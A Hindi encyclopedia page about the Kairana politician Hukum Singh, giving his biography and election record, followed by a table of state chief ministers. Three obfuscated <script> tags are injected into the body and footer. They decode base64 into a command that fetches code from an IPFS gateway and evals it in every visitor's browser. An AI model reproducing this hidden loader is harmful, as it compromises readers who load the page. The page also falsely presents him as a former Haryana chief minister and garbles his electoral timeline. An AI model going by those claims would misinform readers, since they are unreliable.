हुकुम सिंह  

हुकुम सिंह
पूरा नाम हुकुम सिंह
जन्म 5 अप्रॅल, 1938
जन्म भूमि कैराना, शामली, उत्तर प्रदेश
मृत्यु 3 फ़रवरी, 2018
मृत्यु स्थान नोएडा, उत्तर प्रदेश
अभिभावक पिता- मानसिंह

माता- लीलावती

पति/पत्नी रेवती सिंह
संतान पाँच
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय जनता पार्टी, भारतीय राष्ट्रीय काँग्रेस
पद भूतपूर्व मुख्यमंत्री, हरियाणा - 17 जुलाई, 1990 से 21 मार्च, 1991 तक
अन्य जानकारी साल 2014 में 2,36,828 वोटों के अंतर से नहिद हसन को हराते हुए हुकुम सिंह ने 16वीं लोकसभा चुनाव में जीत दर्ज की थी।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>हुकुम सिंह (अंग्रेज़ी: Hukum Singh, जन्म- 5 अप्रॅल, 1938, शामली, उत्तर प्रदेश; मृत्यु- 3 फ़रवरी, 2018) भारतीय राजनीतिज्ञ तथा सोलहवीं लोकसभा के सांसद थे। वे हरियाणा के मुख्यमंत्री भी रहे। 2014 के चुनावों में वे उत्तर प्रदेश की कैराना सीट से भारतीय जनता पार्टी के टिकट पर चुनाव लड़कर निर्वाचित हुए थे। कानून की पढ़ाई करने वाले हुकुम सिंह ने भारतीय सेना में अधिकृत अधिकारी के तौर पर काम किया। इतना ही नहीं उन्होंने 1965 की पाकिस्तान संग लड़ाई में कैप्टन पद पर रहते हुए जिम्मेदारी भी निभाई थी।

परिचय

हुकुम सिंह जी का जन्म शामली, उत्तर प्रदेश के कैराना में 5 अप्रॅल, 1938 को हुआ था। भले ही आज पूर्व सांसद हुकुम सिंह इस दुनिया में नहीं हैं लेकिन राजनीति और संसदीय क्षेत्र के विकास की बात करें तो उनका नाम काफी सम्मान के साथ आज भी लिया जाता है। उत्तर प्रदेश से 7 बार विधायक भी रह चुके हुकुम सिंह सेवानिवृत्त सैन्य अधिकारी थे। साथ ही वे एक वकील भी थे।

राजनीति

1974 में कैराना निर्वाचन क्षेत्र से कांग्रेस की टिकट पर पहली बार विधानसभा चुनाव लड़ा था। कांग्रेस के सदस्य रहते हुए उन्होंने इस निर्वाचन क्षेत्र से जीत और हार दोनों का सामना किया। हालांकि 1996 में भाजपा में शाामिल हुए और विधानसभा चुनाव लड़ा और कैराना निर्वाचन क्षेत्र के विधायक के रूप में पद बरकरार रखा। 1996-2012-2014 में कैराना निर्वाचन क्षेत्र से 16वीं लोकसभा चुनाव के लिए चुने गए।

साल 2014 में 2,36,828 वोटों के अंतर से नहिद हसन को हराते हुए हुकुम सिंह ने 16वीं लोकसभा चुनाव में जीत दर्ज की थी। 2012 में बसपा के अनवर हसन को कैराना में 19,543 वोटो हराते हुए चुनाव जीता। 2007 राष्ट्रीय दल के अरशद को 8500 वोटों से हराते हुए छठी बार कैराना विधानसभा क्षेत्र से जीत का स्वाद चखा था। 2002 सपा के राजेश्वर कुमार को 10,483 मतों के अंतर से हराकर पांचवी बार एमएलए बनें थे।

योगदान

हुकुम सिंह ने युवाओं के लिए रोजगार, कृषि क्षेत्र में बढ़ोतरी और गाँवो का हर स्तर पर विकास, महिला सशक्तिकरण और शिक्षा के क्षेत्र में कार्य किया। जाटों के आरक्षण के लिए उन्होने लड़ाई शुरू की और 1991 में 'गुरनाम सिंह आयोग' का गठन किया।

मृत्यु

सांस लेने में तकलीफ होने के कारण 3 फ़रवरी, 2018 को हुकुम सिंह ने दम तोड़ दिया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=हुकुम_सिंह&oldid=660108" से लिया गया